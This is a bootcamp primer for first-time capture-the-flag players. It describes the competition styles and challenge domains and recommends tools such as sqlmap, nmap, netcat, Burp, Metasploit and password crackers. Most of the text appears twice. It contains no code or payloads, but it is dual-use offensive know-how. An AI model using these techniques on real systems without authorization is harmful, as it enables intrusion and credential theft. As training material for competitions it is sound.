Bootcamp Project: CTF Primer
So you want to play in a digital Capture The Flag (CTF)??
The first step is always finding and registering in the CTF you want to play in. After that, this guide is here to help you prepare for your first CTF, aka expect the unexpected.
First, look for local CTFs or register for some Online CTFs.
Think CTFs are over your head? Think again:
Breaking the CTFs down we have three styles to look at: Jepordy, Offensive-Scenario, Offense-Defense.
Offensive-Scenario: Typically involves either attack scenarios or live systems to attack. These types of CTFs will emulate penetration testing over other forms of hacking.
Offensive-Defense: Will typically put the player both in the role of defender and attacker. Often times securing ones own services is paramount, such that they can be queried by scoring bots and shown as still up. The offensive part typically involves attacking other players defenses and attempting to bring their services down, such that they can't score w/ the scoring bot.
Jeopardy: Multiple categories and domains with increasing point challenges. The board is modeled after the popular show Jeopardy. Often the most popular CTF challenge.
Some Domains to expect:
Reverse Engineering: Often involves disassembling / decompiling binaries and altering their functionality in such a way that you can retrieve a flag either through their new execution path.
Megapost on RE tools.
Many different disassemblers out there.
objdump is great!
ShellCode / Binary: Often involves interpreting a binary blob and either pulling a flag or transforming the data.
Goto tools: file, strings, exiftool, virustotal, PEiD.
Web / Cloud: These often involve exploiting some type of web service, typically being some type of exercise in the OWASP top 10, although this could be any web or service based exploit.
Burp or Zapp web intercept proxy.
Sqlmap, but know manual, error based, union, and blind SQLi.
Mozilla is great because of the non-native interface, so you can have an http proxy on mozilla, and still use chrome or whatever other for web.
Some good plugins for Firefox: grease monkey, or inspect + javascript console.
Dirbuster to find directories or files that you can't readily see.
Any vuln or web application scanner, check to see if it has output compatible w/ Metasploit
Network / traffic analysis: Often involves some type of basic network connection and service exploit. Typically over some arbitrary protocol, sometimes esoteric and sometimes unique, such as ascii patterns over telnet.
Use nmap for discovery, basic things like -Pn to drop pings, nmap scripts are HUGE.
Netcat, socat for manging socket connections.
Know your basic connections for mysql, ldap, smtp, snmp.
nslookup, dig are useful.
wireshark running in the background or analyzing pcaps.
Any versions you find, check them on CVE-details or exploit-db.
Have a script ready for network socket connections, such as a python wrapper.
Forensics: Can involve being given either a file or file system.
For a regular file, again run file, strings, and exiftool.
If you make it to a file system grep or find.
If you are looking at a dd filesystem the sleuth kid, fstat, fls, mmls, icat.
Check timestamps, alternate file streams on Windows.
Crypto / Stego: Often some type of encryption challenge or puzzle, involving some prior knowledge of encryption or utilizing encryption tools. While stenography is not cryptography, you will often run into a stenography challenge, so it will be helpful to be familiar w/ common stego tools.
OpenSSL is often used because of it's ubiquity. Be ready to code.
Stegdetect is good for finding the use of very common stego tools.
Hashes / Passwords: Involves cracking hashes for points, or bruiting passwords or services. It's to have a dedicated cracking machine, however in a pinch you can easily use Amazon's EC2 or a paid service. Your best bet here is to have your cracking tools, wordlists, and rainbow tables ready to go well before the challenge.
For pw-cracking have ready johnTheRipper, OCLHashCat, or something quick online for nt hash lookups.
Triva / Misc: Often involves random hacker facts or random hacker based challenges, typically involves adding hacker culture to the challenge. You've seen 'War Games' right?
Programming: Sometimes there are tasks that involve solving simple challenges either in high magnitude or at a high frequency, requiring automation. Often in Offensive - Defensive style CTFS automating one's defenses is the best bet.
General Toolsets:
Kali Linux 64 bit and Windows 64 bit
(You will want 64bit OSes such that if you receive a 64 bit binary for a reverse engineering challenge you can run it and disassemble it. These operating systems are also backwards compatible with 32 bit operating systems, so you will be able to reverse engineer those binaries as well.)
Always mind your connection! Make sure your on a good connection, ssl if wifi, check your certs or use a vpn.
Internal msgs / fileshares, know the rules regarding and be careful of wireshark / sniffing / shoulder surfing - use good communications and plan for subterfuge. This is Infosec after all. For more good info on preparing for a CTF, checkout the CTF Field Guide!
The first step is always finding and registering in the CTF you want to play in. After that, this guide is here to help you prepare for your first CTF, aka expect the unexpected.
First, look for local CTFs or register for some Online CTFs.
Think CTFs are over your head? Think again:
Breaking the CTFs down we have three styles to look at: Jepordy, Offensive-Scenario, Offense-Defense.
Offensive-Scenario: Typically involves either attack scenarios or live systems to attack. These types of CTFs will emulate penetration testing over other forms of hacking.
Offensive-Defense: Will typically put the player both in the role of defender and attacker. Often times securing ones own services is paramount, such that they can be queried by scoring bots and shown as still up. The offensive part typically involves attacking other players defenses and attempting to bring their services down, such that they can't score w/ the scoring bot.
Jeopardy: Multiple categories and domains with increasing point challenges. The board is modeled after the popular show Jeopardy. Often the most popular CTF challenge.
Some Domains to expect:
Reverse Engineering: Often involves disassembling / decompiling binaries and altering their functionality in such a way that you can retrieve a flag either through their new execution path.
Megapost on RE tools.
Many different disassemblers out there.
objdump is great!
ShellCode / Binary: Often involves interpreting a binary blob and either pulling a flag or transforming the data.
Goto tools: file, strings, exiftool, virustotal, PEiD.
Web / Cloud: These often involve exploiting some type of web service, typically being some type of exercise in the OWASP top 10, although this could be any web or service based exploit.
Burp or Zapp web intercept proxy.
Sqlmap, but know manual, error based, union, and blind SQLi.
Mozilla is great because of the non-native interface, so you can have an http proxy on mozilla, and still use chrome or whatever other for web.
Some good plugins for Firefox: grease monkey, or inspect + javascript console.
Dirbuster to find directories or files that you can't readily see.
Any vuln or web application scanner, check to see if it has output compatible w/ Metasploit
Network / traffic analysis: Often involves some type of basic network connection and service exploit. Typically over some arbitrary protocol, sometimes esoteric and sometimes unique, such as ascii patterns over telnet.
Use nmap for discovery, basic things like -Pn to drop pings, nmap scripts are HUGE.
Netcat, socat for manging socket connections.
Know your basic connections for mysql, ldap, smtp, snmp.
nslookup, dig are useful.
wireshark running in the background or analyzing pcaps.
Any versions you find, check them on CVE-details or exploit-db.
Have a script ready for network socket connections, such as a python wrapper.
Forensics: Can involve being given either a file or file system.
For a regular file, again run file, strings, and exiftool.
If you make it to a file system grep or find.
If you are looking at a dd filesystem the sleuth kid, fstat, fls, mmls, icat.
Check timestamps, alternate file streams on Windows.
Crypto / Stego: Often some type of encryption challenge or puzzle, involving some prior knowledge of encryption or utilizing encryption tools. While stenography is not cryptography, you will often run into a stenography challenge, so it will be helpful to be familiar w/ common stego tools.
OpenSSL is often used because of it's ubiquity. Be ready to code.
Stegdetect is good for finding the use of very common stego tools.
Hashes / Passwords: Involves cracking hashes for points, or bruiting passwords or services. It's to have a dedicated cracking machine, however in a pinch you can easily use Amazon's EC2 or a paid service. Your best bet here is to have your cracking tools, wordlists, and rainbow tables ready to go well before the challenge.
For pw-cracking have ready johnTheRipper, OCLHashCat, or something quick online for nt hash lookups.
Triva / Misc: Often involves random hacker facts or random hacker based challenges, typically involves adding hacker culture to the challenge. You've seen 'War Games' right?
Programming: Sometimes there are tasks that involve solving simple challenges either in high magnitude or at a high frequency, requiring automation. Often in Offensive - Defensive style CTFS automating one's defenses is the best bet.
General Toolsets:
Kali Linux 64 bit and Windows 64 bit
(You will want 64bit OSes such that if you receive a 64 bit binary for a reverse engineering challenge you can run it and disassemble it. These operating systems are also backwards compatible with 32 bit operating systems, so you will be able to reverse engineer those binaries as well.)
Always mind your connection! Make sure your on a good connection, ssl if wifi, check your certs or use a vpn.
Internal msgs / fileshares, know the rules regarding and be careful of wireshark / sniffing / shoulder surfing - use good communications and plan for subterfuge. This is Infosec after all. For more good info on preparing for a CTF, checkout the CTF Field Guide!